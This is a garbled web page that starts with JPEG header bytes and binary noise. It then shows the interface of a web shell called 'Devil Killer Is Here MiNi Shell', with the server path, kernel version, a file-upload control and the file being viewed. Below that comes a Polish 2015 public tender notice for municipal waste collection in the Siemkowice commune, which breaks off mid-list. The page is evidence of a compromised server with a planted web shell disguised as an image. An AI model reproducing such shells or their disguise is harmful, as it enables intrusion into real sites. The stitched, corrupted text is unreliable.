JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151029/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151029/290416-N-2015.html

<p class="kh_header"><b>Siemkowice: Odbiór i zagospodarowanie odpadów komunalnych pochodzących  z nieruchomości zamieszkałych położonych na terenie gminy Siemkowice</b><br>
<b>Numer ogłoszenia: 290416 - 2015; data zamieszczenia: 29.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Siemkowicach , Plac XXX-lecia PRL 1, 98-354 Siemkowice, woj. łódzkie, tel. 43 8417217, faks 43 8417269.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.siemkowice.biuletyn.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych pochodzących  z nieruchomości zamieszkałych położonych na terenie gminy Siemkowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia  
Przedmiotem zamówienia jest usługa polegająca na odbieraniu i zagospodarowaniu stałych odpadów komunalnych pochodzących z nieruchomości zamieszkałych położonych na terenie gminy Siemkowice. 
Miejscem realizacji zamówienia jest cały teren administracyjny gminy Siemkowice, obejmujący następujące miejscowości: Mokre, Ignaców, Miętno, Ożegów, Siemkowice, Marchewki,  Łukomierz, Bugaj Lipnicki, Delfina, Kolonia Lipnik, Lipnik, Mazaniec, Borki, Laski, Pieńki Laskowskie, Bugaj Radoszewicki, Tądle, Radoszewice, Kije, Katarzynopole, Zmyślona, Mierzanów, 

2.	Zakres zamówienia 

Szczegółowy zakres zamówienia obejmuje: 
- odbiór stałych odpadów komunalnych bezpośrednio od właścicieli nieruchomości oraz ich zagospodarowanie; 
 - odbiór i zagospodarowanie odpadów zgromadzonych w Punkcie Selektywnego Zbierania Odpadów Komunalnych (PSZOK); 
- przeprowadzenie objazdowej zbiórki odpadów wielkogabarytowych oraz zagospodarowanie zebranych odpadów.  

Odbiór odpadów komunalnych bezpośrednio od właścicieli nieruchomości  

1. Bezpośrednio z nieruchomości odbierane będą następujące rodzaje odpadów: 

1)	odpady komunalne zmieszane (niesegregowane) o kodzie 20 03 01; 

2)	odpady komunalne segregowane z podziałem na następujące frakcje: 
- odpady opakowaniowe szklane o kodzie 15 01 07; 
- zmieszane odpady opakowaniowe o kodzie 15 01 06, tj. papier, metal, tworzywa sztuczne, opakowania wielomateriałowe (tzw. odpady suche); 

2.	Odbiór odpadów komunalnych będzie się odbywał z następującą częstotliwością: 
- odpady komunalne zmieszane - 1 raz w miesiącu; 
- odpady opakowaniowe szklane - 1 raz w kwartale; 
- odpady suche - 1 raz w miesiącu; 

3.	Na czas realizacji zamówienia Wykonawca wyposaży nieruchomości w pojemniki na odpady. Pojemniki powinny mieć określone pojemności oraz oznaczenia kolorystyczne: 
- odpady komunalne zmieszane - pojemniki 120l i 240l - kolor zielony; 
- odpady opakowaniowe szklane - pojemniki 120l - kolor pomarańczowy; 
- dpady suche - pojemniki 240l - kolor żółty;

Pojemniki wstawiane na posesje powinny być czyste i utrzymane w należytym stanie technicznym, umożliwiającym ich prawidłowe użytkowanie. W przypadku uszkodzeń powstałych w wyniku normalnego użytkowania lub powstałych z winy Wykonawcy, obowiązkiem Wykonawcy będzie naprawa pojemników lub ich wymiana. W przypadku uszkodzeń powstałych z winy osób użytkujących pojemniki, np. spalenie czy użytkowanie pojemników niezgodnie z ich przeznaczeniem, naprawa pojemników lub ich wymiana dokonywana będzie na koszt użytkownika danego pojemnika. 


4.	Szczegółowy wykaz nieruchomości wraz z rodzajem oraz ilością pojemników, 
w które należy je wyposażyć na czas realizacji zamówienia, Zamawiający przekaże Wykonawcy w dniu podpisania umowy.  

Szacunkowe ilości pojemników, które należy zabezpieczyć: 
- odpady zmieszane 120l - 977 szt. 
- odpady zmieszane 240l - 308 szt. 
- odpady szklane 120l - 1242 szt. 
- odpady suche 240l - 1246 szt.     

Podane ilości są ilościami szacunkowymi i mogą ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego, przy uwzględnieniu powstawania nowych nieruchomości, urodzin i zgonów oraz migracji ludności. Zmiany będą przekazywane przez Zamawiającego dwa razy w miesiącu - w połowie oraz na koniec miesiąca kalendarzowego, natomiast Wykonawca w terminie 7 dni od otrzymania aktualizacji zobowiązany będzie do dokonania wymiany lub wstawienia pojemników na wskazane posesje. 

5.	Odbiór odpadów będzie następował w dniach określonych w harmonogramie wywozu, z pojemników wystawionych przez właścicieli nieruchomości na zewnątrz posesji, przy drodze dojazdowej  do których zapewniony jest swobodny dojazd i dostęp z zewnątrz. 

6.	W zakresie odbioru odpadów z nieruchomości o utrudnionym dojeździe (brak utwardzonej drogi, wąskie pasy drogowe) Wykonawca,  za zgodą Zamawiającego, może ustalić odrębne terminy wywozu niż dla pozostałych nieruchomości w danej miejscowości. W związku z powyższym Wykonawca powinien również posiadać pojazd  przystosowany do odbioru odpadów z posesji o utrudnionym dojeździe. 

Na chwilę obecną w gminie Siemkowice 6 nieruchomości wymagają zastosowania opisanych w punkcie 6 czynności.  

7.	W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamknięcie drogi) gdy nie jest możliwa realizacja usługi zgodnie z harmonogramem, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym, a Wykonawcą  i może polegać w szczególności na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli nieruchomości oraz innych terminów ich odbioru. 

8.	Wykonawca zobowiązany jest do odbierania każdej ilości odpadów znajdującej się  w pojemniku, bez względu na stopień jego zapełnienia.  

9.	Zamawiający przewidział również możliwość świadczenia usług dodatkowych dla mieszkańców w zakresie odbierania odpadów komunalnych wszystkich trzech frakcji. Usługa dodatkowa wiąże się z koniecznością wstawienia pojemnika odpowiedniego dla danego rodzaju odpadu oraz odbiorem odpadu zgodnie z harmonogramem wywozu dla danej miejscowości. Za każdy m3 odpadów odebranych w ramach świadczenia usług dodatkowych Wykonawcy będzie należało się dodatkowe wynagrodzenie.  


10.	Szacunkowe ilości odpadów do odbioru i zagospodarowania w trakcie realizacji przedmiotu zamówienia: 
 
[Mg] 	Łączna ilość w roku [Mg] 
1. 	Odpady komunalne zmieszane 	20 03 01 		400,00 
2. 	Odpady opakowaniowe szklane 	15 01 07 		90,00
3. 	Odpady suche 15 01 06 				    80,00

Odbiór odpadów zgromadzonych w PSZOK 

1.	Punkt Selektywny Zbierania Odpadów Komunalnych dla mieszkańców gminy Siemkowice będzie zlokalizowany w Siemkowicach, ul. Parkowa 1. 
2.	Z Punktu Selektywnego Zbierania Odpadów Komunalnych odbierane będą następujące rodzaje odpadów: 
- odpady wielkogabarytowe o kodzie 20 03 07; 
- odpady budowlano - rozbiórkowe o kodzie 17 09 04; 
- odpady  zielone o kodzie 20 02 01; 
- chemikalia (farby, rozpuszczalniki, oleje odpadowe) o kodach 200113*, 
20 0114*, 20 01 15*, 20 01 19*, 20 01 27*, 20 01 29*,
- przeterminowane leki o kodzie 20 01 32;
- zużyty sprzęt elektryczny i elektroniczny o kodach 20 01 23, 20 01 35*, 20 01 36,
- zużyte opony o kodzie 16 01 03;
- zużyte baterie i akumulatory o kodzie 20 01 34.

3.	Odbiór odpadów z PSZOK będzie odbywał się w miarę potrzeb Zamawiającego, na zgłoszenie, jednak nie rzadziej niż jeden raz w kwartale dla każdego rodzaju odpadu. 

4.	Na czas realizacji zamówienia Wykonawca zabezpieczy na potrzeby Zamawiającego  kontener na odpady budowlano - remontowe KP - 7 . Kontener będzie wstawiany do PSZOK na zgłoszenie Zamawiającego, w celu załadowania i wywozu zebranych odpadów. Załadunek odpadów do tych kontenerów będzie obowiązkiem Zamawiającego.  
Dodatkowo na czas realizacji zamówienia na potrzeby PSZOK należy zabezpieczyć dwa pojemniki siatkowe na odpady typu PET oraz dwa zestawy pojemników typu IGLOO (zestaw to jeden pojemnik na szkło kolorowe i jeden pojemnik na szkło białe). 

5.	Szacunkowe ilości odpadów do odbioru i zagospodarowania w trakcie realizacji 
               przedmiotu zamówienia: 	Łączna ilość odpadów [Mg] 
1. 	Odpady wielkogabarytowe 	20 03 07 	90,00 	18,00 
2. 	Odpady budowlano - remontowe 	17 09 04 	20,00 	15,00 
3. 	Odpady opakowaniowe szklane 	15 01 07 	16,00 	3,00 
4. 	Odpady z tworzyw sztucznych 	15 01 02 	30,00 	2,50 


Objazdowa zbiórka odpadów wielkogabarytowych

1.	Zbiórka objazdowa odpadów wielkogabarytowych jest organizowana w gminie Siemkowice jeden raz w roku, w miesiącu wrześniu. Zamawiający ustali z Wykonawcą, 
z przynajmniej miesięcznym wyprzedzeniem, termin realizacji tej części zamówienia oraz jej harmonogram.  

2.	Podczas akcji objazdowej Wykonawca zbierze od mieszkańców następujące rodzaje odpadów: 
- odpady wielkogabarytowe o kodzie 20 03 07; 
- metale (złom) o kodzie 20 01 40; 
- zużyte urządzenia elektryczne i elektroniczne o kodach 20 01 35* i 20 01 36; 
- urządzenia zawierające freony o kodzie 20 01 23*; 
- zużyte opony ( do rozmiaru 1250/400) o kodzie 16 01 03; 
- baterie i akumulatory o kodzie 20 01 33*; 
- odpady ulegające biodegradacji (gałęzie, listwy drewniane) o kodzie 20 02 01. 

3.	Obowiązkiem Wykonawcy będzie objazd wszystkich miejscowości położonych na terenie gminy Siemkowice, załadunek wystawionych przed posesje odpadów na środek transportu, posprzątanie miejsca, z którego zabierane są odpady, a następnie ich wywóz i zagospodarowanie. 

4.	Szacunkowe ilości odpadów do odbioru i zagospodarowania w trakcie realizacji 
            przedmiotu zamówienia: Łączna ilość odpadów [Mg] 
1. 	Odpady wielkogabarytowe 20 03 07 	- 45,00 
2. 	Metale (złom) 20 01 40 	                    -   0,01 
3. 	Zużyte urządzenia elektryczne  i elektroniczne 	 20 01 35* 20 01 36 	- 0,10 
4. 	Urządzenia zawierające freony 	 20 01 23* 	- 0,10 
5. 	Zużyte opony  (do rozmiaru 1250/400) 	16 01 03 	- 5,00 
6. 	Baterie i akumulatory 	 20 01 33* 	- 0,01 
7.  	Odpady ulegające biodegradacji 	20 02 01 	- 0,10 

3. Inne informacje istotne z punktu widzenia Zamawiającego: 
1)	Przez gminę Siemkowice przebiega około 110 km dróg, z czego około 90% stanowią drogi o nawierzchni asfaltowej. Pozostałe drogi są utwardzone, tylko około 11 km dróg to drogi gruntowe. 
2)	Ilość deklaracji złożonych na dzień 27.10.2015 r.: 1242
3)	Ilość posesji, które zgłosiły zbieranie odpadów bez segregacji: 4. 
4)	Ilość mieszkańców w gminie wg złożonych deklaracji: 4192 

4. Obowiązki Wykonawcy 

1)	Gospodarowanie odpadami komunalnymi zgodnie z przepisami obowiązującymi 
2)	w tym zakresie.  

3)	Przekazywanie odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania zmieszanych odpadów komunalnych przeznaczonych do składowania do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych właściwej dla Regionu II lub, w szczególnych przypadkach, do instalacji przewidzianej do zastępczej obsługi Regionu II zgodnie z Planem Gospodarki Odpadami dla Województwa Łódzkiego. 

4)	Przekazywanie selektywnie zebranych odpadów komunalnych do instalacji odzysku 
 i unieszkodliwiania zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz. U. 
 z 2013 r. poz. 21 ze zm.). 

5)	Uzyskanie poziomu ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania w poszczególnych latach zgodnie  
z Rozporządzeniem Ministra Środowiska z dnia 25.05.2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów  (Dz. U. z 2012 r. poz. 676). 
6)	Uzyskanie: 
a)	poziomu recyklingu i przygotowania do ponownego użycia następujących frakcji odpadów komunalnych: papieru, metali, tworzyw sztucznych i szkła, 
b)	poziomu recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami    innych    niż    niebezpieczne    odpadów    budowlanych    i     rozbiórkowych 
w poszczególnych latach zgodnie z Rozporządzeniem Ministra Środowiska z dnia 29.05.2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia 
 i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. poz. 645). 

6)	Przygotowanie   harmonogramu   odbioru odpadów oraz  jego wydruk
 i dostarczenie właścicielom nieruchomości. Wykonawca ma obowiązek przedłożyć przygotowany projekt kalendarza do wglądu Zamawiającemu. 

7)	Kontrolowanie   właścicieli  nieruchomości   pod  kątem  wypełniania  obowiązku 
w  zakresie  selektywnego  zbierania  odpadów  komunalnych. O  zaistniałych sytuacjach 
nieprawidłowej  segregacji   odpadów  Wykonawca  zawiadamia  Zamawiającego  drogą elektroniczną   lub  pisemnie  do 7-go   dnia   każdego  miesiąca   za   miesiąc  poprzedni. 
Do   zawiadomienia   Wykonawca   dołącza   wykaz   nieruchomości   zawierający:   dzień wywozu,   miejscowość,   ulicę   i   numer   posesji    oraz   krótki    opis   i    dokumentację fotograficzną, obrazujące podstawę udzielenia ostrzeżenia właścicielowi nieruchomości.

Szczegółowy sposób i zakres świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów określają uchwała nr  XXIII/105/12 Rady Gminy Siemkowice z dnia 28 grudnia 2012r.z późń. zm., uchwała nr XXV/118/13 Rady Gminy Siemkowice z dnia 24 kwietnia 2013r. w sprawie uchwalenia regulaminu utrzymania czystości 
i porządku na terenie Gminy Siemkowice oraz Regulamin utrzymania czystości 
i porządku na terenie gminy Siemkowice, stanowiące załącznik nr 10 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku: 

Wykonawca  zobowiązany jest wykazać,  że: 
- posiada aktualny wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie  z wymogami Ustawy z dnia 13 września 1996 roku  o utrzymaniu czystości  i porządku w gminie (Dz. U. z 2013 r. poz. 1399     ze zm.); 
- posiada aktualne zezwolenie na transport, odzysk bądź unieszkodliwianie odpadów komunalnych zgodnie z wymogami Ustawy z dnia 14 grudnia 2012 r.  o odpadach (Dz. U. z 2013 r. poz. 21 ze zm.) lub równoważne, w tym wydane na podstawie wcześniejszych przepisów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku: 
Wykonawca spełni ten warunek, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał lub wykonuje co najmniej  jedno zadanie odpowiadające swym rodzajem i zakresem przedmiotowi zamówienia tj. wykonał lub wykonuje co najmniej jedną usługę odbioru i zagospodarowania odpadów komunalnych od właścicieli nieruchomości, świadczoną w sposób ciągły przez okres minimum 12 miesięcy, o masie łącznej minimum 800 Mg, wraz z dokumentami potwierdzającymi, że usługa ta została wykonana lub jest wykonywana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku: 

Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować na czas realizacji zadania: 

1)	pojazdami spełniającymi wymagania określone w Rozporządzeniu Ministra Środowiska z dn. 11.01.2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, w tym: 
- co najmniej 2 samochodami przystosowanymi do odbierania zmieszanych odpadów komunalnych,  
- co najmniej 2 samochodami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych,  
- co najmniej 1 pojazdem do odbierania odpadów komunalnych bez funkcji kompaktującej,  
- co najmniej 1 pojazdem do odbioru odpadów komunalnych z nieruchomości  o utrudnionym dostępie; 

2)	bazą magazynowo - transportową spełniającą wymagania określone  
w Rozporządzeniu Ministra Środowiska z dn. 11.01.2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości,  tj. usytuowaną w odległości nie większej niż 60 km od granicy gminy Siemkowice na terenie do którego Wykonawca posiada tytuł prawny, wyposażoną w miejsce przeznaczone do parkowania pojazdów, zabezpieczone przed emisją zanieczyszczeń do gruntu, wyposażoną w miejsce do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych, wyposażoną  w legalizowaną samochodową wagę najazdową, w przypadku gdy na terenie bazy następuje magazynowanie odpadów, wyposażoną w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, wyposażoną w pomieszczenia socjalne dla pracowników odpowiadające liczbie zatrudnionych osób, na której terenie znajduje się punkt konserwacji i napraw pojazdów oraz miejsce do mycia i dezynfekcji pojazdów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku:</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełnienia tego warunku: 

Wykonawca spełni ten warunek, jeżeli wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, w wysokości nie niższej niż  400 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

